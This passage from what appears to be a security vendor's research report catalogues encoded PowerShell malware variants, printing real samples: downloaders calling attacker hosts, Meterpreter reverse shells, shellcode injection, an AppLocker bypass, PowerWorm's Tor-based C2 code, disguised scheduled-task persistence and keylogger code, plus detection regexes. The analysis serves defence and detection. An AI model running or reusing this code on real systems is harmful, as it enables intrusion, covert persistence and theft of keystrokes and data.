-match\r\n'@(.*)@'){$str += [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($matches[1]))}\r\nelse {break\\;}$i++}iex $str@\"\r\nThis allows the attacker to establish a command and control channel when they are ready to interact with the compromised\r\nsystem.\r\nJohn Lambert over at Microsoft recently tweeted about this variant and identified it as being used during penetration testing.\r\nAnother example of the technique can be found in the Nishang framework for penetration testing.\r\nDownloader Proxy (9 Samples – 0.22% Coverage)\r\nThis variant will explicitly use the configured proxy and credentials for the user running the PowerShell command. Of note\r\nfor this one is the passing of the username as a value to the “u” parameter in the web request. This is a common “check-in”\r\nactivity so the attacker knows whom they have infected; it can be used to further handle how subsequent interactions take\r\nplace (e.g. block further connections if known sandbox username).\r\nhttps://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\r\nPage 11 of 35\n\n$x=$Env:username;$u=\"http://54.213.195[.]138/s2.txt?u=\" + $x;$p =\r\n[System.Net.WebRequest]::GetSystemWebProxy();$p.Credentials=\r\n[System.Net.CredentialCache]::DefaultCredentials;$w=New-Object\r\nnet.webclient;$w.proxy=$p;$w.UseDefaultCredentials=$true;$s=$w.DownloadString($u);Invoke-Expression -\r\nCommand $s;\r\nMeterpreter RHTTP (6 Samples – 0.15% Coverage)\r\nThis next technique simply pulls down the Invoke-Shellcode script used in tools such as PowerShell Empire and\r\nPowerSploit, and then calls the function to generate a reverse HTTPS Meterpreter shell.\r\nAll but one of the samples pulled code from GitHub, either directly through the official repository or through a forked\r\nversion.\r\nGitHub –\r\niex (New-Object\r\nNet.WebClient).DownloadString(\"https://raw.githubusercontent.com/PowerShellEmpire/Empire/master/data/module_source/code_execution/Invoke\r\nShellcode.ps1\"); Invoke-Shellcode -Payload windows/meterpreter/reverse_http -Lhost 88.160.254[.]183 -Lport 8080 -Force\r\nNon-GitHub –\r\nIEX (New-Object Net.WebClient).DownloadString('http://el8[.]pw/ps/CodeExecution/Invoke-Shellcode.ps1');\r\nInvoke-Shellcode -Payload windows/meterpreter/reverse_https -Lhost 65.112.221[.]34 -Lport 443 –Force\r\nDownloader Kraken (5 Samples – 0.12% Coverage)\r\nI called this one “Kraken” simply because of the filename of the executable it downloads, (“Kraken.jpg”), but it uses a\r\nsimilar download technique as seen in Downloader DFSP. One difference is that instead of using the “$env” variable\r\ndirectly, it uses System.IO.Path to retrieve the path for the $TEMP directory.\r\n$TempDir = [System.IO.Path]::GetTempPath(); (New-Object\r\nSystem.Net.WebClient).DownloadFile(\"http://kulup.isikun.edu.tr/Kraken.jpg\",\"  $TempDir\\syshost.exe\"); start\r\n$TempDir\\syshost.exe;\r\nAppLocker Bypass (4 Samples – 0.12% Coverage)\r\nThis next technique uses PowerShell to run the regsvr32 tool to bypass Microsoft Windows AppLocker. This technique was\r\nfound by Casey Smith (@subTee) and abuses the fact that scripts are executed when unregistering a COM object via\r\nregsvr32.\r\nregsvr32 /u /s /i:http://\u0026lt;IP_REDACTED\u0026gt;/test.jpg scrobj.dll\r\nEmbedded Payloads\r\nPowerShell code identified with the primary intention of launching embedded payloads, such as shellcode.\r\nShellcode Inject (1,147 Samples – 27.98% Coverage),\r\nUnicorn (611 Samples – 14.90% Coverage),\r\nSET (199 Samples – 4.85% Coverage),\r\nUnicorn Modified (14 Samples – 0.34% Coverage)\r\nAs I already showed examples of SET and Magic Unicorn’s implementation of the Shellcode Injection technique, I’ve\r\ndecided to just lump all of the variants together using this shellcode injection template. Below is a sample from the\r\n“Shellcode Inject” variant, which is a copy of Matt Graeber’s original post, and you’ll immediately see the similarities with\r\nthe SET and Magic Unicorn code.\r\nhttps://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\r\nPage 12 of 35\n\n$c = '[DllImport(\"kernel32.dll\")]public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwSize, uint\r\nflAllocationType, uint flProtect);[DllImport(\"kernel32.dll\")]public static extern IntPtr CreateThread(IntPtr\r\nlpThreadAttributes, uint dwStackSize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr\r\nlpThreadId);[DllImport(\"msvcrt.dll\")]public static extern IntPtr memset(IntPtr dest, uint src, uint count);';$w = Add-Type -memberDefinition $c -Name \"Win32\" -namespace Win32Functions -passthru;[Byte[]];[Byte[]]$z =\r\n0xbf,\u0026lt;SHELLCODE\u0026gt;,0x19;$g = 0x1000;if ($z.Length -gt 0x1000){$g =\r\n$z.Length};$x=$w::VirtualAlloc(0,0x1000,$g,0x40);for ($i=0;$i -le ($z.Length-1);$i++) {$w::memset([IntPtr]\r\n($x.ToInt32()+$i), $z[$i], 1)};$w::CreateThread(0,0,$x,0,0,0);for (;;){Start-sleep 60};\r\nWhile the Cerber downloader accounted for a large sum of the EncodedCommand found in Microsoft Word documents,\r\nthese four variants use the same technique accounting for almost the entirety launched from EXE files.\r\nThe gist of the code is that they import functions from DLL’s in the following order:\r\n“kernel32.dll” VirtualAlloc\r\n“kernel32.dll” CreateThread\r\n“msvcrt.dll” memset\r\nThen they load their shellcode into an array of bytes using the “0x” hex representation. Next, they call VirtualAlloc to\r\nallocate, at minimum, a 4,096 byte page of RWX memory, copy the byte-array to memory with memset, and finally transfer\r\nexecution to the shellcode with CreateThread.\r\nOut of the 1,971 samples, there were 1,211 unique shellcode payloads, indicating that over 50% of them were re-used in\r\nother attacks. Most of these tools utilize Metasploit to generate the shellcode and if they don’t accept specifying a payload,\r\ngenerally opted for reverse Meterpreter shells. For example, the below line is from the Magic Unicorn’s code showing how\r\nto specify the MSF payload.\r\nprint(\"PS Example: python unicorn.py windows/meterpreter/reverse_tcp 192.168.1.5 443\")\r\nThe underlying code for the generation of the payload, including platform, architecture, and encoding:\r\n\"msfvenom -p %s %s %s StagerURILength=5 StagerVerifySSLCert=false -e x86/shikata_ga_nai -a x86 --platform\r\nwindows --smallest -f c\" % (\r\n            payload, ipaddr, port), stdout=subprocess.PIPE, stderr=subprocess.PIPE, shell=True)\r\nAnother interesting observation is that if you look at the shellcode length, the top 2 lengths were 294 and 312 bytes long,\r\nwith 846 and 544 samples respectively; afterwards the sample counts fall off sharply.\r\nShellcode Length (Bytes) Count\r\n294 846\r\n312 544\r\n337 145\r\n303 131\r\n285 46\r\nWhat makes this interesting is the sheer volume of identical lengths signals to me that they are likely generating the same\r\npayload with the same tools and using something without much possible variation in length, such as a 4-byte IP compared to\r\na variable length URL as the C2.\r\nAs this blog serves to catalog the differences between these variants, below are regex queries to identify the specific variant.\r\nShellcode Inject\r\n\"^(\\$c = |\\$1 = [\\\"\\']\\$c = )\"\r\n\"\\$g = 0x1000\"\r\n\"\\$z\\.Length \\-gt 0x1000\"\r\nhttps://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\r\nPage 13 of 35\n\n\"\\$z\\[\\$i\\]\"\r\nUnicorn\r\n\"\\$w \\= Add\\-Type \\-memberDefinition \\$[a-zA-Z0-9]{3,4} \\-Name\"\r\nSET\r\n\"\\$code \\= [\\']{1,2}\\[DllImport\"\r\n\"\\$sc\\.Length -gt 0x1000\\)\"\r\n\"\\$winFunc::memset\"\r\nUnicorn Modified\r\n\"^\\$[a-zA-Z0-9]{5,7} \\= \\'\\[DllImport.+Start\\-sleep 60\\}\\;\"\r\nPowerfun Reverse (100 Samples – 2.44% Coverage),\r\nPowerfun Bind (2 Samples – 0.05% Coverage)\r\nAnother variation to code execution was found inside Powerfun, more specifically they use Metasploit’s\r\n“windows/powershell_reverse_tcp” and “powershell_bind_tcp” payloads to create interactive shells with the target system.\r\nThe reverse payload is encoded with base64 and launched via a background process using System.Diagnostics.Process.\r\nReverse payload –\r\nif([IntPtr]::Size -eq 4){$b='powershell.exe'}else{$b=$env:windir+'\\syswow64\\WindowsPowerShell\\v1.0\\powershell.exe'};$s=New-Object\r\nSystem.Diagnostics.ProcessStartInfo;$s.FileName=$b;$s.Arguments='-nop -w hidden -c $s=New-Object IO.MemoryStream(,\r\n[Convert]::FromBase64String(''H4sIAFHL6FcCA71W6nlhxGUKAAA=''));IEX (New-Object IO.StreamReader(New-Object IO.Compression.GzipS\r\n[IO.Compression.CompressionMode]::Decompress))).ReadToEnd();';$s.UseShellExecute=$false;$s.RedirectStandardOutput=$true;$s.WindowStyle\r\n[System.Diagnostics.Process]::Start($s);\r\nThe bind payload sets up a TCP listener by listening with System.Net.Sockets.TCPClient and passing received PowerShell\r\nscript to Invoke-Expression.\r\nBind payload –\r\n$client = New-Object System.Net.Sockets.TCPClient(\"192.168.56.144\",4444);$stream = $client.GetStream();[byte[]]$bytes =\r\n0..255|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName\r\nSystem.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2\u0026gt;\u0026amp;1 | Out-String );$sendback2  =\r\n$sendback + \"PS \" + (pwd).Path + \"\u0026gt; \";$sendbyte =\r\n([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\r\nPowerWorm (19 Samples – 0.46% Coverage)\r\nPowerWorm is a malware family that TrendMicro blogged about in 2014 which has the capability of spreading by infecting\r\nother Microsoft Office DOC(X)/XLS(X) files. The PowerShell code is obfuscated with “junk” data placed between the\r\nlegitimate commands.\r\n'xneZtEDC';$ErrorActionPreference = 'SilentlyContinue';'uqaaPxuaCN';'DOBHbJqlkRM';$kn = (get-wmiobject\r\nWin32_ComputerSystemProduct).UUID;'WVy';'gKEZgPRMl';if ((gp\r\nHKCU:\\\\Software\\Microsoft\\Windows\\CurrentVersion\\Run) -match $kn){;'mUzql';'jsvZDTQITNa';(Get-Process -id\r\n$pid).Kill();'NgpYRhj';'hVXjCtDvBc';};'tUVXQmXbZ';'lkTzhJZHwxU';'McPzodeY';'vNNYv';function e($dkez)\r\n{;'TfPD';'WTw';$jt = (((iex \"nslookup -querytype=txt $dkez 8.8.8.8\") -match '\"') -replace '\"', '')\r\n[0].Trim();'HdCjwAD';'sVSjtZRvr';$ovg.DownloadFile($jt, $tg);'raVw';'OQNdBkS';$ei =\r\n$ke.NameSpace($tg).Items();'OgnucmQlK';'Qfqxov';$ke.NameSpace($sa).CopyHere($ei, 20);'GBMdJNr';'VMWS';rd\r\n$tg;'pnoFau';'SedloE';};'NxPZPIV';'ypi';'AFElBzCp';'bYRWML';'UYANxqtLg';'QBC';$sa = $env:APPDATA + '\\' +\r\nhttps://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\r\nPage 14 of 35\n\n$kn;'Eaxyty';'IwuaOh';if (!(Test-Path $sa)){;'amYmrKg';'vWAgqtEB';$qr = New-Item -ItemType Directory -Force -Path\r\n$sa;'GqNII';'HNPIQutUpGv';$qr.Attributes = \"Hidden\", \"System\",\r\n\"NotContentIndexed\";'MuRuRa';'CmlkCszVCO';};'ZdmIGyj';'nAYhOpvWV';'BIAgIntvoU';'GJTBzyjr';$zul=$sa+\r\n'\\tor.exe';'swInqmX';'LTXwOFNSuL';$axs=$sa+\r\n'\\polipo.exe';'qkI';'WJPoaNnarn';$tg=$sa+'\\'+$kn+'.zip';'Sgw';'fYthyZ';$ovg=New-Object\r\nSystem.Net.WebClient;'Ils';'GRldQfFnfQK';$ke=New-Object -C Shell.Application;'vVoutJQ';'gHXAsaxc';'llaetDv';'Zix';if (!\r\n(Test-Path $zul) -or !(Test-Path $axs)){;'QtJINrwhS';'XkAxtKLAJ';e\r\n'i.vankin.de';'QqVujkSIPS';'dZdn';};'GoemQSlIB';'IOcJU';'FYTMzpCupR';'qEnstu';if (!(Test-Path $zul) -or !(Test-Path $axs))\r\n{;'ZGtSt';'mHkBgIOsU';e\r\n'gg.ibiz.cc';'sDtXmE';'xSBk';};'YaiaAJqKPin';'gFVK';'TumvJVvJKRm';'ULQwp';$pj=$sa+'\\roaminglog';'numdmmhA';'ytEF';saps\r\n$zul -Ar \" --Log `\"notice file $pj`\"\" -wi Hidden;'JCBc';'CjHbOtf';do{sleep 1;$xxl=gc $pj}while(!($xxl -match 'Bootstrapped\r\n100%: Done.'));'wYtpNVJtdz';'XggiQIPFt';saps $axs -a \"socksParentProxy=localhost:9050\" -wi Hidden;'dlV';'zVLSO';sleep\r\n7;'FzlDdEynuUz';'Ci';$zpp=New-Object System.Net.WebProxy(\"localhost:8123\");'MsOkmLs';'zRW';$zpp.useDefaultCredentials\r\n= $true;'PWXVXIMqb';'lAy';$ovg.proxy=$zpp;'gEkdkGPjVp';'xerooSjz';$ca='http://powerwormjqj42hu[.]onion/get.php?\r\ns=setup\u0026amp;mom=14C6EFBB-F19D-DC11-83A7-001B38A0DF85\u0026amp;uid=' + $kn;'SGCFq';'GkVVnp';while(!$qmh)\r\n{$qmh=$ovg.downloadString($ca)};'rHo';'jtshvrR';if ($qmh -ne 'none'){;'Ju';'VuUTlp';iex $qmh;'blhE';'AeIepyNd';};'whSp';\r\nCleaned-up slightly –\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n$ErrorActionPreference = 'SilentlyContinue';\r\n$kn = (get-wmiobject Win32_ComputerSystemProduct).UUID;\r\nif ((gp HKCU:\\\\Software\\Microsoft\\Windows\\CurrentVersion\\Run) -match $kn) {;\r\n(Get-Process -id $pid).Kill();\r\n};\r\nfunction e($dkez){;\r\n$jt = (((iex \"nslookup -querytype=txt $dkez 8.8.8.8\") -match '\"') -replace '\"', '')[0].Trim();\r\n$ovg.DownloadFile($jt, $tg);\r\n$ei = $ke.NameSpace($tg).Items();\r\n$ke.NameSpace($sa).CopyHere($ei, 20);\r\nrd $tg;\r\n};\r\n$sa = $env:APPDATA + '\\' + $kn;\r\nif (!(Test-Path $sa)){;\r\n$qr = New-Item -ItemType Directory -Force -Path $sa;\r\n$qr.Attributes = \"Hidden\", \"System\", \"NotContentIndexed\";\r\n};\r\n$zul=$sa+ '\\tor.exe';\r\n$axs=$sa+ '\\polipo.exe';\r\n$tg=$sa+'\\'+$kn+'.zip';\r\n$ovg=New-Object System.Net.WebClient;\r\n$ke=New-Object -C Shell.Application;\r\nif (!(Test-Path $zul) -or !(Test-Path $axs)){;\r\ne 'i.vankin.de';\r\n};\r\nif (!(Test-Path $zul) -or !(Test-Path $axs)){;\r\ne 'gg.ibiz.cc';\r\nhttps://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\r\nPage 15 of 35\n\n28\r\n29\r\n30\r\n31\r\n32\r\n33\r\n34\r\n35\r\n36\r\n37\r\n38\r\n39\r\n40\r\n41\r\n42\r\n43\r\n44\r\n45\r\n46\r\n47\r\n48\r\n49\r\n50\r\n51\r\n52\r\n53\r\n54\r\n55\r\n56\r\n};\r\n$pj=$sa+'\\roaminglog';\r\nsaps $zul -Ar \" --Log `\"notice file $pj`\"\" -wi Hidden;\r\ndo{\r\nsleep 1;\r\n$xxl=gc $pj\r\n} while(!($xxl -match 'Bootstrapped 100%: Done.'));\r\nsaps $axs -a \"socksParentProxy=localhost:9050\" -wi Hidden;\r\nsleep 7;\r\n$zpp=New-Object System.Net.WebProxy(\"localhost:8123\");\r\n$zpp.useDefaultCredentials = $true;\r\n$ovg.proxy=$zpp;\r\n$ca='http://powerwormjqj42hu[.]onion/get.php?s=setup\u0026amp;mom=\u0026amp;uid=' + $kn;\r\nwhile(!$qmh){\r\n$qmh=$ovg.downloadString($ca)\r\n};\r\nif ($qmh -ne 'none'){;\r\niex $qmh;\r\n};\r\nThe code will download Tor and Polipo by fetching download URL’s for the software from DNS TXT records and then\r\neventually use the software to continuously check for new PowerShell commands that get passed to Invoke-Expression.\r\nMatt Graeber has done an excellent job of analyzing the full capabilities of this malware and provides de-obfuscated,\r\ncommented, versions of the underlying PowerShell.\r\nVeil Stream (7 Samples – 0.17% Coverage)\r\nThis is a similar technique as described in the “Powerfun Reverse” variant. The PowerShell code is injected into memory\r\nfrom a base64 string and executed with Invoke-Expression that eventually launches the actual shellcode payload. The layout\r\nof the code correlates to the Veil Framework implementation.\r\nInvoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object\r\nIO.MemoryStream (,$([Convert]::FromBase64String('rVZtb5tIEP4eKf9+nJvw==')))),\r\n[IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\r\nhttps://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\r\nPage 16 of 35\n\nPersistence\r\nPowerShell code identified with the primary intention of establishing persistence on the host.\r\nScheduled Task COM (11 Samples – 0.27% Coverage)\r\nThis variant seeks to create a persistence mechanism by creating a Scheduled Task that runs the malicious binary. The PE\r\nfile this sample comes from drops a “minecraft.exe” and then launches this PowerShell command below - most likely, as it’s\r\neasier to pass this type of functionality off to PowerShell instead of trying to write the code into the original dropper.\r\nThe technique was seen primarily is samples associated to the Retefe banking trojan.\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n$TaskName = \"Microsoft Windows Driver Update\"\r\n$TaskDescr = \"Microsoft Windows Driver Update Services\"\r\n$TaskCommand = \"C:\\ProgramData\\WindowsUpgrade\\minecraft.exe\"\r\n$TaskScript = \"\"\r\n$TaskArg = \"\"\r\n$TaskStartTime = [datetime]::Now.AddMinutes(1)\r\n$service = new-object -ComObject(\"Schedule.Service\")\r\n$service.Connect()\r\n$rootFolder = $service.GetFolder(\"\\\")\r\n$TaskDefinition = $service.NewTask(0)\r\n$TaskDefinition.RegistrationInfo.Description = \"$TaskDescr\"\r\n$TaskDefinition.Settings.Enabled = $true\r\n$TaskDefinition.Settings.Hidden = $true\r\n$TaskDefinition.Settings.RestartCount = \"5\"\r\n$TaskDefinition.Settings.StartWhenAvailable = $true\r\n$TaskDefinition.Settings.StopIfGoingOnBatteries = $false\r\n$TaskDefinition.Settings.RestartInterval = \"PT5M\"\r\n$triggers = $TaskDefinition.Triggers\r\n$trigger = $triggers.Create(8)\r\n$trigger.StartBoundary = $TaskStartTime.ToString(\"yyyy-MM-dd'T'HH:mm:ss\")\r\n$trigger.Enabled = $true\r\n$trigger.Repetition.Interval = \"PT5M\"\r\n$TaskDefinition.Settings.DisallowStartIfOnBatteries = $true\r\n$Action = $TaskDefinition.Actions.Create(0)\r\n$action.Path = \"$TaskCommand\"\r\n$action.Arguments = \"$TaskArg\"\r\n$rootFolder.RegisterTaskDefinition(\"$TaskName\",$TaskDefinition,6,\"System\",$null,5)\r\nSCHTASKS /run /TN $TaskName\r\nVB Task (10 Samples – 0.24% Coverage)\r\nThis grouping of PowerShell code originally comes from a PE that executes PowerShell with the EncodedCommand, which\r\nthen creates a VBScript that is installed as a Scheduled Task. The VBSript simply launches another PowerShell script once it\r\nruns to achieve this.\r\nhttps://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\r\nPage 17 of 35\n\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\n33\r\n34\r\n35\r\n36\r\n37\r\n38\r\n39\r\n$path= \"$env:userprofile\\appdata\\local\\microsoft\\Windows\"\r\nif(-not(Test-Path -Path($path)))\r\n{mkdir $path}\r\n$fileout=\"$path\\L69742.vbs\";\r\n$encstrvbs=\"c2V0IHdzcyA9IENyZWF0ZU9iamVjdCgiV1NjcmlwdC5TaGVsbCIpDQpzdHIgPSAicG93ZXIiICYgInNoIiAmICJlbGwiICYgIi5lI\r\n$bytevbs=[System.Convert]::FromBase64String($encstrvbs);\r\n$strvbs=[System.Text.Encoding]::ASCII.GetString($bytevbs);\r\n$strvbs = $strvbs.replace('#dpath#',$path);\r\nset-content $fileout $strvbs;\r\n$tmpfile=\"$env:TEMP\\U1848931.TMP\";\r\n$pscode_b64  =get-content $tmpfile | out-string;\r\n$pscode_b64=$pscode_b64.trim();\r\n$pscode = [System.Text.Encoding]::Unicode.GetString([System.Convert]::FromBase64String($pscode_b64))\r\n$id = [string](get-random -min 10000 -max 100000)\r\n$pscode = $pscode.replace('#id#',$id);\r\nset-content \"$path\\mc.ps1\" $pscode\r\n$taskstr=\"schtasks /create /F /sc minute /mo 2 /tn \"\"GoogleServiceUpdate\"\" /tr \"\"\\\"\"$fileout\"\"\\\"\"   \";\r\niex 'cmd /c $taskstr';\r\n{{CODE}}\r\nThe base64 decoded VBScript –\r\n{{CODE}}\r\nset wss = CreateObject(\"WScript.Shell\")\r\nstr = \"power\" \u0026amp; \"sh\" \u0026amp; \"ell\" \u0026amp; \".e\" \u0026amp; \"xe -NoP -sta -NonI -e\" \u0026amp; \"xe\" \u0026amp; \"c byp\" \u0026amp; \"as\" \u0026amp; \"s -fi\" \u0026amp; \"\r\npath = \"#dpath#\"\r\nstr = str + path + \"\\mc.ps1\"\r\nwss.Run str, 0\r\nhttps://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\r\nPage 18 of 35\n\n40\r\n41\r\n42\r\n43\r\n44\r\nDynAmite Launcher (6 Samples – 0.15% Coverage),\r\nDynAmite KL (1 Sample – 0.02% Coverage)\r\nDynAmite is a “Malware Creation Toolkit” which comes with your standard capabilities that one comes to expect with such\r\na tool.\r\nIt does give you the ability to mix and match the features you want and generates a PE wrapper that carries out the selected\r\ntasks, usually by simply executing PowerShell commands. The majority of code that I saw generated by this kit was taken\r\nfrom public tools but used swapped around variable names and locations.\r\nThe “DynAmite Launcher” variant covers the persistence aspect, which is established through creating Scheduled Tasks.\r\nBelow are three different iterations of this, most likely from different versions and configurations.\r\nschtasks.exe /create /TN \"Microsoft\\Windows\\DynAmite\\Backdoor\" /XML C:\\Windows\\Temp\\task.xml\r\nschtasks.exe /create /TN \"Microsoft\\Windows\\DynAmite\\Keylogger\" /XML C:\\Windows\\Temp\\task2.xml\r\nSCHTASKS /run /TN \"Microsoft\\Windows\\DynAmite\\Backdoor\"\r\nSCHTASKS /run /TN \"Microsoft\\Windows\\DynAmite\\Keylogger\"\r\nRemove-Item \"C:\\Windows\\Temp\\*.xml\"\r\n#create backdoor task\r\nschtasks.exe /create /TN \"Microsoft\\Windows\\DynAmite\\DynAmite\" /XML C:\\Windows\\Temp\\dynatask.xml\r\n#create upload task\r\nschtasks.exe /create /TN \"Microsoft\\Windows\\DynAmite\\Uploader\" /XML C:\\Windows\\Temp\\upltask.xml\r\n#run backdoor task\r\nSCHTASKS /run /TN \"Microsoft\\Windows\\DynAmite\\DynAmite\"\r\n#create registry entries for keylogger and screenspy\r\nNew-ItemProperty -path HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run -Name Keylogger -\r\nPropertyType String -Value \"C:\\Windows\\dynakey.exe\"\r\nNew-ItemProperty -path HKLM:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run -Name ScreenSpy -\r\nPropertyType String -Value \"C:\\Windows\\dynascr.exe\"\r\n#run keylogger and screenspy\r\nhttps://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\r\nPage 19 of 35\n\nC:\\Windows\\dynakey.exe\r\nC:\\Windows\\dynascr.exe\r\n#cleanup temp folder\r\nRemove-Item \"C:\\Windows\\Temp\\*\"\r\n$loot = ($env:LOCALAPPDATA + \"\\dyna\\\"); md $loot\r\ncertutil -decode res.crt ($loot + \"res\"); certutil -decode kl.crt ($loot + \"kl.exe\"); certutil -decode st.crt ($loot +\r\n\"st.exe\");  certutil -decode cry.crt ($loot + \"cry.exe\"); certutil -decode t1.crt ($env:TEMP + \"\\t1.xml\"); certutil -\r\ndecode t2.crt ($env:TEMP + \"\\t2.xml\"); certutil -decode t3.crt ($env:TEMP + \"\\t3.xml\"); certutil -decode t4.crt\r\n($env:TEMP + \"\\t4.xml\"); certutil -decode t5.crt ($env:TEMP + \"\\t5.xml\"); certutil -decode bd.crt\r\nC:\\ProgramData\\bd.exe\r\nschtasks.exe /create /TN \"Microsoft\\Windows\\Windows Printer Manager\\1\" /XML ($env:TEMP + \"\\t1.xml\")\r\nschtasks.exe /create /TN \"Microsoft\\Windows\\Windows Printer Manager\\2\" /XML ($env:TEMP + \"\\t2.xml\")\r\nschtasks.exe /create /TN \"Microsoft\\Windows\\Windows Printer Manager\\3\" /XML ($env:TEMP + \"\\t3.xml\")\r\nschtasks.exe /create /TN \"Microsoft\\Windows\\Windows Printer Manager\\4\" /XML ($env:TEMP + \"\\t4.xml\")\r\nschtasks.exe /create /TN \"Microsoft\\Windows\\Windows Printer Manager\\5\" /XML ($env:TEMP + \"\\t5.xml\")\r\nschtasks.exe /run /TN \"Microsoft\\Windows\\Windows Printer Manager\\1\"\r\nschtasks.exe /run /TN \"Microsoft\\Windows\\Windows Printer Manager\\2\"\r\nschtasks.exe /run /TN \"Microsoft\\Windows\\Windows Printer Manager\\3\"\r\nschtasks.exe /run /TN \"Microsoft\\Windows\\Windows Printer Manager\\4\"\r\nschtasks.exe /run /TN \"Microsoft\\Windows\\Windows Printer Manager\\5\"\r\nRemove-Item ($env:TEMP + \"\\*.xml\") -Recurse –Force\r\nFor the “DynAmite KL” variant, it’s the keylogger portion of the kit but directly lifts code from an older version of the\r\nPowerSploit function Get-Keystrokes. Below are the meat of the script and a comparison of the two pieces, showing how\r\nDynAmite changes the location of the variables and types.\r\nGet-Keystrokes –\r\n1\r\n2\r\n3\r\n4\r\n5\r\n6\r\n7\r\n8\r\n9\r\n10\r\n11\r\n12\r\n13\r\n14\r\n15\r\n$LeftShift    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LShiftKey) -band 0x8000) -eq 0x8000\r\n$RightShift   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RShiftKey) -band 0x8000) -eq 0x8000\r\n$LeftCtrl     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LControlKey) -band 0x8000) -eq 0x8000\r\n$RightCtrl    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RControlKey) -band 0x8000) -eq\r\n0x8000\r\n$LeftAlt      = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LMenu) -band 0x8000) -eq 0x8000\r\n$RightAlt     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RMenu) -band 0x8000) -eq 0x8000\r\n$TabKey       = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Tab) -band 0x8000) -eq 0x8000\r\n$SpaceBar     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Space) -band 0x8000) -eq 0x8000\r\n$DeleteKey    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Delete) -band 0x8000) -eq 0x8000\r\n$EnterKey     = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Return) -band 0x8000) -eq 0x8000\r\n$BackSpaceKey = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Back) -band 0x8000) -eq 0x8000\r\n$LeftArrow    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Left) -band 0x8000) -eq 0x8000\r\n$RightArrow   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Right) -band 0x8000) -eq 0x8000\r\n$UpArrow      = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Up) -band 0x8000) -eq 0x8000\r\nhttps://researchcenter.paloaltonetworks.com/2017/03/unit42-pulling-back-the-curtains-on-encodedcommand-powershell-attacks/\r\nPage 20 of 35\n\n16\r\n17\r\n18\r\n19\r\n20\r\n21\r\n22\r\n23\r\n24\r\n25\r\n26\r\n27\r\n28\r\n29\r\n30\r\n31\r\n32\r\n$DownArrow    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::Down) -band 0x8000) -eq 0x8000\r\n$LeftMouse    = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::LButton) -band 0x8000) -eq 0x8000\r\n$RightMouse   = ($ImportDll::GetAsyncKeyState([Windows.Forms.Keys]::RButton) -band 0x8000) -eq 0x8000\r\nif ($LeftShift -or $RightShift) {$LogOutput += '[Shift]'}\r\nif ($LeftCtrl  -or $RightCtrl)  {$LogOutput += '[Ctrl]'}\r\nif ($LeftAlt   -or $RightAlt)   {$LogOutput += '[Alt]'}\r\nif ($TabKey)       {$LogOutput += '[Tab]'}\r\nif ($SpaceBar)     {$LogOutput += '[SpaceBar]'}\r\nif ($DeleteKey)    {$LogOutput += '[Delete]'}\r\nif ($EnterKey)     {$LogOutput += '[Enter]'}\r\nif ($BackSpaceKey) {$LogOutput += '[Backspace]'}\r\nif ($LeftArrow)    {$LogOutput += '[Left Arrow]'}\r\nif ($RightArrow)   {$LogOutput += '[Right Arrow]'}\r\nif ($UpArrow)      {$LogOutput += '[Up Arrow]'}\r\nif ($DownArrow)    {$LogOutput += '[Down Arrow]'}\r\nif ($LeftMouse)    {$LogOutput += '[Left Mouse]'}\r\nif 